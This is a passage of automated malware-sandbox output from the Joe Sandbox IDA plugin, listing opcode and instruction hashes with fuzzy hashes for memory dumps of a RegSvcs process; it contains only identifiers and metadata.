                                                        • Instruction Fuzzy Hash: F7E0BF743051419BC354CB14C851E26FBE6EFD9255F24C46DA989C7365DB32EC03CB41
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eccb7abcb4b2e76c691cfccc77b0427adf7f352d5fca457ee3086a9b4c3689b7
                                                        • Instruction ID: ee114c834c345b916fb4b4ddfa8209124f293a1fe362fa4130f7ea2378e9d48e
                                                        • Opcode Fuzzy Hash: eccb7abcb4b2e76c691cfccc77b0427adf7f352d5fca457ee3086a9b4c3689b7
                                                        • Instruction Fuzzy Hash: E1D05E35705214AFC301AF7CE888C853FAC9F4A76034100A9F405CB266DB21AC118BA1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 92200cc90b25f7e04a42fd75ae055fba2e6acdf8cb147366db247619227fc0be
                                                        • Instruction ID: ee81a5496d73b59dc7da1c5ad6efe11e8614ee9b0b16c2ff4c5fceac183ff637
                                                        • Opcode Fuzzy Hash: 92200cc90b25f7e04a42fd75ae055fba2e6acdf8cb147366db247619227fc0be
                                                        • Instruction Fuzzy Hash: 93E0ECA210C2D15FC392CB68E9608ABFFF98E8E510B19888EF4C1C6656C559DA06D772
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 933d099e11b8405be98867894fc94281be15322ea485309dd734541508fc2981
                                                        • Instruction ID: 5a7f4cc3513d048622553466cb148b0034165e494fb8397dae8304bf3e7f6db1
                                                        • Opcode Fuzzy Hash: 933d099e11b8405be98867894fc94281be15322ea485309dd734541508fc2981
                                                        • Instruction Fuzzy Hash: 98E0EC741083529FE3028F08D851896FBB5FF8A218715CCEAEC909B251DB619C56D761
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5165533c61d1bc37e08454cd69f44db9b0d592f2c366bedc9d50ee0963329e7d
                                                        • Instruction ID: 8925b47113f857146c61c03d93a73e5231972841e9048864f6552c8a0de5f408
                                                        • Opcode Fuzzy Hash: 5165533c61d1bc37e08454cd69f44db9b0d592f2c366bedc9d50ee0963329e7d
                                                        • Instruction Fuzzy Hash: 42E0C2A1A093C8AFCB01EBF89D1049EBFEADB0720070000EAD506E7162E9304A049766
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cf20674626f741093048a6ee0c6b52e67f0aa0c70d97eb31c8695a7b8851e99
                                                        • Instruction ID: 901e725a7c0444e898b06276bd8d1c1aabec706f620ccab540a270b954ac50d0
                                                        • Opcode Fuzzy Hash: 8cf20674626f741093048a6ee0c6b52e67f0aa0c70d97eb31c8695a7b8851e99
                                                        • Instruction Fuzzy Hash: C3E08CB250C2605FC342CB04DA5192BBBF99FC6A00B0B848BF884EB252C621DC1AC772
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8513a76a3151203dc1f764bb2bc5df104e16643152f1dc114fa283a8c31852a0
                                                        • Instruction ID: 0811fba4bb63bd0345f8683bd3eea115f0815e2dde97d3e15a6a0ab9573ef9e9
                                                        • Opcode Fuzzy Hash: 8513a76a3151203dc1f764bb2bc5df104e16643152f1dc114fa283a8c31852a0
                                                        • Instruction Fuzzy Hash: E1D0173420D3D05FD342DB68C8A2866BF76EF87200709C8DEE4818B2A2C622D80BC751
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 73830e8053c315937a1ee019cf2eca055e1651b875b2167b7983cea8a40c1fdd
                                                        • Instruction ID: 08ad78404690ada98d5faba037547f5777e913185a7bf20ebc2a86fbca3d5dd1
                                                        • Opcode Fuzzy Hash: 73830e8053c315937a1ee019cf2eca055e1651b875b2167b7983cea8a40c1fdd
                                                        • Instruction Fuzzy Hash: 35D05E32A45108EFDB40DBE8E8017EEBBF59B45310F1042AAD408E7650ED354A14AB62
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2538fdcb22f7640d120f5082e562769cf603b8d573b9d4abaeb9b597de3d5f54
                                                        • Instruction ID: 8e25ba8532f4585f2eb58b3e98f7183f8812ef7cc70cabb2f2f8b7f4aecc545d
                                                        • Opcode Fuzzy Hash: 2538fdcb22f7640d120f5082e562769cf603b8d573b9d4abaeb9b597de3d5f54
                                                        • Instruction Fuzzy Hash: 9FD012362081116BE245CA04E942BAAB7E5EBC4714F08C84EA84097341C661DC06CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7786ff93c5f1468c88eea86cfdb23435301d9dc89e99815699cfc207088f90f2
                                                        • Instruction ID: 87af7b599bcd50039c5e60ebd55acf65f38635212f9ca690dc9ad0ec2a499c75
                                                        • Opcode Fuzzy Hash: 7786ff93c5f1468c88eea86cfdb23435301d9dc89e99815699cfc207088f90f2
                                                        • Instruction Fuzzy Hash: 3BD05E331140119BD254CA44EA82EEBB7E5EBC8A10F048C1EF84097711DA72DC0786A2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                                                        • Instruction ID: 74bd5e682b91a2d78f462f720d40d5774850364329bd47b2e62bddd07364fa43
                                                        • Opcode Fuzzy Hash: a8e6a07dc12e02ad3e5ed504a5308a9fd4191ff32c073443818bcad8348e5d37
                                                        • Instruction Fuzzy Hash: B2D012321001187F8B01CE84DC01CA67B6DEB89260704C056FD1487211C672DD22DBE0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64578155a94ef4c212cf07e87f713f2d2aee0428e58f8055e1aa33984be35f1a
                                                        • Instruction ID: 6b2a0c868abd0a77a7c1701a6744e35a1323a06f40709a439a11c3c45c82d178
                                                        • Opcode Fuzzy Hash: 64578155a94ef4c212cf07e87f713f2d2aee0428e58f8055e1aa33984be35f1a
                                                        • Instruction Fuzzy Hash: 6FD0A7771142105BD394D908D886AE7B7A6FBC8320F08880FF44087702DA61EC078691
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8969fd848031057e4b4607e60b1984a903ff80500520dfae51c8b837e8095e90
                                                        • Instruction ID: 24648ad1b3bf4f955b76ae00d33ae0a4fd779243491a4f06617be02ef2ba35e4
                                                        • Opcode Fuzzy Hash: 8969fd848031057e4b4607e60b1984a903ff80500520dfae51c8b837e8095e90
                                                        • Instruction Fuzzy Hash: 0BD01776118210ABD200CB04EA02E2AFBF6EFC9614F19C84EF842A3320C662DD06C762
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c9045fddf28a64378a362910647c144d1800f3e148eac3a9d37e676ce67d0cdc
                                                        • Instruction ID: 9c52e1bbcfebee9f127f079b8893f207d2e1966e4642a2797f66ab5aa20e159c
                                                        • Opcode Fuzzy Hash: c9045fddf28a64378a362910647c144d1800f3e148eac3a9d37e676ce67d0cdc
                                                        • Instruction Fuzzy Hash: 76D05E361080109FE204CA44ED82F96B7E6EBC8720F24840EF80093340CA66EC038B72
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d96c72ba0707353425b680f3d7fbef52a93fdbb397a673acc127508cae73ade7
                                                        • Instruction ID: dc0921968b765e2c1106933ac763f00898be779db960bbb4218deaea61d6a67d
                                                        • Opcode Fuzzy Hash: d96c72ba0707353425b680f3d7fbef52a93fdbb397a673acc127508cae73ade7
                                                        • Instruction Fuzzy Hash: 22D05E765582D05BD300DB54DA01972BB6EEBCA208F08C84FE59243211C6619C03C7A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75d576f3e8fdbd4e4f60813cfab5972328f7d392ff18c80ea3d5b1be66b63049
                                                        • Instruction ID: 162b7c0a66c86bdca8d63dff4ea53a7cd69286307e2ec4cbbbb24211bc6e0c67
                                                        • Opcode Fuzzy Hash: 75d576f3e8fdbd4e4f60813cfab5972328f7d392ff18c80ea3d5b1be66b63049
                                                        • Instruction Fuzzy Hash: 24D01231D05108AFCB41DBB9A9017EDB7F59B85220F1007E59455D7290D9324A05AB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de9547cf42f35605887322cf954baf6e06a8139018ce36a98044b04f3386d929
                                                        • Instruction ID: 3382b4b1db142b5cc190b794a9350bb5e6640809811f9a762275d2e55ca15faa
                                                        • Opcode Fuzzy Hash: de9547cf42f35605887322cf954baf6e06a8139018ce36a98044b04f3386d929
                                                        • Instruction Fuzzy Hash: EFD0A77B1142105FD244D904DC96AE3BBF5FBC8220F08880FE80087702DE62DC46C6A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                                                        • Instruction ID: d8e6f52d84d0e9a7535ad6c92223e7db018a165c074aefbb2bfd7201b7f166f6
                                                        • Opcode Fuzzy Hash: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                                                        • Instruction Fuzzy Hash: D3D05E322001187F8B00CE88DC00CA67BADEB89220B04C05AFD5887241CAB2ED22DBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c02a0710dc66e413173b8cab0f3a4f365f61b10976d60fb60dc104dbb0ef91d
                                                        • Instruction ID: ca8ec52df2427c8c37a4b4c08ec1b37613ef9dafe1a0b6503cd8e2669da1f17d
                                                        • Opcode Fuzzy Hash: 2c02a0710dc66e413173b8cab0f3a4f365f61b10976d60fb60dc104dbb0ef91d
                                                        • Instruction Fuzzy Hash: 36D0C2721080119FC700CE00E951E9AF7A5DFC8610F05884EF84057300CA619C06CBB3
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03c33c6bff63c285cd4751ac30ddf145263a5f22bb088c6bf847ccbde48cacea
                                                        • Instruction ID: 2524a7b601649cae719fa0c3a29684f8c3349dabaf992747b8f24389e60b2432
                                                        • Opcode Fuzzy Hash: 03c33c6bff63c285cd4751ac30ddf145263a5f22bb088c6bf847ccbde48cacea
                                                        • Instruction Fuzzy Hash: 05D05E726142129FD304C904C841BA6B3A6EBE9714F19886AE410D3345CA36CC068AA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 178fe005d5d3b80d13e937d1d4abbd942e5401fce8e5cdf4ef8bab102749609d
                                                        • Instruction ID: c97305b4baa924bcf2e97980ce86d6100d3426e28fc0a9324861ffe2e913b395
                                                        • Opcode Fuzzy Hash: 178fe005d5d3b80d13e937d1d4abbd942e5401fce8e5cdf4ef8bab102749609d
                                                        • Instruction Fuzzy Hash: E6D05E761081119FD744CE18ED81EABBBE9EBC8A10F18844EB84097301CA62DC06CBB2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d882cd8e1c1272c420b66b269ffcc4509f99b5fd721c113ac5cfb12f53ea2aa3
                                                        • Instruction ID: d8f30f0361013718f48b8a0b9e49ae6aff9f0b05769b78bcf4fb71dc03b4012a
                                                        • Opcode Fuzzy Hash: d882cd8e1c1272c420b66b269ffcc4509f99b5fd721c113ac5cfb12f53ea2aa3
                                                        • Instruction Fuzzy Hash: 40E0127550D2419FD306CF54D950959BBF2EFCA620B18C48EE891576A1C6319C17CB72
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7b0d5fa7dd39bcd3ea820b9e9bccc3198def0afbb8d1976228febc0057405f65
                                                        • Instruction ID: 7d5ea3f04bf1f6a2b422ef261506537e01880b62ce0bd503dd1c142e9c719c37
                                                        • Opcode Fuzzy Hash: 7b0d5fa7dd39bcd3ea820b9e9bccc3198def0afbb8d1976228febc0057405f65
                                                        • Instruction Fuzzy Hash: FED0173120C3C09FD242DB64CCA58A5BFA2EFC6200709C98EE8C147656CA22991BD711
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8f37e7ee152ae7204dd8e90c58bdf49fc93957f1af029f53ce0ebf4b73c18df6
                                                        • Instruction ID: 28ed976a91e0a712c217d1f155dacef61db351a99f27dae05abf439d13fcd789
                                                        • Opcode Fuzzy Hash: 8f37e7ee152ae7204dd8e90c58bdf49fc93957f1af029f53ce0ebf4b73c18df6
                                                        • Instruction Fuzzy Hash: 1BD0127211C3505FC245DA04DD51C1BBBF5DBC5600B14844EB84097252C562DC1ACB72
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21adbd1c9617bab2b5e408af96e5d2700f7b7ebb3767c15a873be770b7908feb
                                                        • Instruction ID: 8d0f4f3a6ca0eaf7c07d0c04de7d5607873063e59f85e91ff1a0d10747c2722e
                                                        • Opcode Fuzzy Hash: 21adbd1c9617bab2b5e408af96e5d2700f7b7ebb3767c15a873be770b7908feb
                                                        • Instruction Fuzzy Hash: DCD0C9723450419FE309C948CC92B19E3A1FBD4328F24C03DA849CB391DE29D8038640
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c86c31abdd3632519320a6ed89bcac422524d754c5cc3e3fe5d0c0889fb5ceeb
                                                        • Instruction ID: 540835c3e0c0a7901f7e448d9f1ec643331c0782214311819967d08faf2af49f
                                                        • Opcode Fuzzy Hash: c86c31abdd3632519320a6ed89bcac422524d754c5cc3e3fe5d0c0889fb5ceeb
                                                        • Instruction Fuzzy Hash: 19D05E722093905FD205CB44CC62C56BBB5EFCA220719888FE8408B392CA659C0BC7A1
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3817785560.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_61f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a153832951c76b3131a47f2d34f0da774272627afc9f7ffd93e0d35d5e8acfa3
                                                        • Instruction ID: 6c2944e29399e1b2a1af4ef0a81b1f11efd8f5d93f134bbbdf0d6cc9805f51d0
                                                        • Opcode Fuzzy Hash: a153832951c76b3131a47f2d34f0da774272627afc9f7ffd93e0d35d5e8acfa3
                                                        • Instruction Fuzzy Hash: A1D0C5761041505BD345D7D4D5429657756F7CB114F14884EE45153352CB619C07D751
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 683bae3e507c36ec01f70622795fce1de8f6215066de3a2410ef0fd8f679df59
                                                        • Instruction ID: c3c753c4f220c868761a5131d88f5081f44ea248a5662bdf0f8b8a019af433a4
                                                        • Opcode Fuzzy Hash: 683bae3e507c36ec01f70622795fce1de8f6215066de3a2410ef0fd8f679df59
                                                        • Instruction Fuzzy Hash: 96E0127511C2415FD242CF54E951C96BBA1EF86610B14888EE480A7252C6219D17DB72
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4082a1ed8d9c7af8b31ddfb077d6f40349eb280f1226583a04397281c1a1afd
                                                        • Instruction ID: 81b767cd8992dc4d3caec805f5434359f55d7c93a2b9e143b4de628fed18d919
                                                        • Opcode Fuzzy Hash: b4082a1ed8d9c7af8b31ddfb077d6f40349eb280f1226583a04397281c1a1afd
                                                        • Instruction Fuzzy Hash: 48E08C7250C2814FD306C614C8608A5BBA1EFCA224B0988EED89087296CA658C17C391
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800981439.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_2d70000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93cd129bc37ab67988a4e0a0ea0f15391c7cd64048d4ddcf1770d5c679436724
                                                        • Instruction ID: 1cdcdc54136656593f7de9a1f87f4b961f1c2cd20f658ab08bd22c8eca62f45a
                                                        • Opcode Fuzzy Hash: 93cd129bc37ab67988a4e0a0ea0f15391c7cd64048d4ddcf1770d5c679436724
                                                        • Instruction Fuzzy Hash: D4D05E6020D1800FC701C724C8A2551BFB09FCA204718C0DED4C8CBA62DA229823C715
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3815106028.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_5600000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfa8fc42c19cef8f94951b4a97e94104d1682cd8547eb1bd55741165f9bebfa7
                                                        • Instruction ID: 7fbc133bf7a4624013202e44b1b827338d8aa4abbfa4d5f15393a00df6311ebb
                                                        • Opcode Fuzzy Hash: dfa8fc42c19cef8f94951b4a97e94104d1682cd8547eb1bd55741165f9bebfa7
                                                        • Instruction Fuzzy Hash: 95D0A732D0120CAFCB40DFE4D9415DEB7F8EB0510074041E69418F3700FD319E00A782
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                        • Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
                                                        • Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                        • Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814867785.00000000055D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 84bbbd124697acedf847172aaf9179fd9091de24c6d1c6dc7c928153356579c3
                                                        • Instruction ID: c90a53778afe6a949a10e99321e99633a5327ec1e84bc8a0288e33aa420bf08a
                                                        • Opcode Fuzzy Hash: 84bbbd124697acedf847172aaf9179fd9091de24c6d1c6dc7c928153356579c3
                                                        • Instruction Fuzzy Hash: 6DE0127110C3904FC346DF58E8A0899BBA0BF86114B188C9FD894C7243C735D806CB61
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8311816956361b407bacf94bcfd81c82682f67a4bda638c525ad9afc28b94eca
                                                        • Instruction ID: 0fea6d222787edc7d7e3016a6791644144010b2691ac550a9ecb52d733cdddc6
                                                        • Opcode Fuzzy Hash: 8311816956361b407bacf94bcfd81c82682f67a4bda638c525ad9afc28b94eca
                                                        • Instruction Fuzzy Hash: D8D05E743092418FC345CB29C812581BBB1AFAB254304C0FADC88CB362EA329D02C710
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3800244207.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_1340000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f5e28bc30b189ad46fac35b5cb24f1c0a42492a133269791181f1525f95f5026
                                                        • Instruction ID: 6eb3acedfbcd0eb2138f44d21243fa107e57f73770795b7fa768c475ac708bd9
                                                        • Opcode Fuzzy Hash: f5e28bc30b189ad46fac35b5cb24f1c0a42492a133269791181f1525f95f5026
                                                        • Instruction Fuzzy Hash: 69D01732200018AF8B01CE94D841CFABB26EB88220B14C05AFC4587211CAB39C22DB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24f7c113dc4b8d0b1deba6f7e149e9027f5a4994f1b1b413566c69df2cd21bb9
                                                        • Instruction ID: 8a314b77ffde4d5e1f3021828c44bd5d3fb15e3f992b579a635780ab5a78a1a2
                                                        • Opcode Fuzzy Hash: 24f7c113dc4b8d0b1deba6f7e149e9027f5a4994f1b1b413566c69df2cd21bb9
                                                        • Instruction Fuzzy Hash: 6ED05E722082008BD200CF48FA01F4AFBD2DBD4620F198C0EF48097346CA2ADC57CA22
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.3814644805.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_55b0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
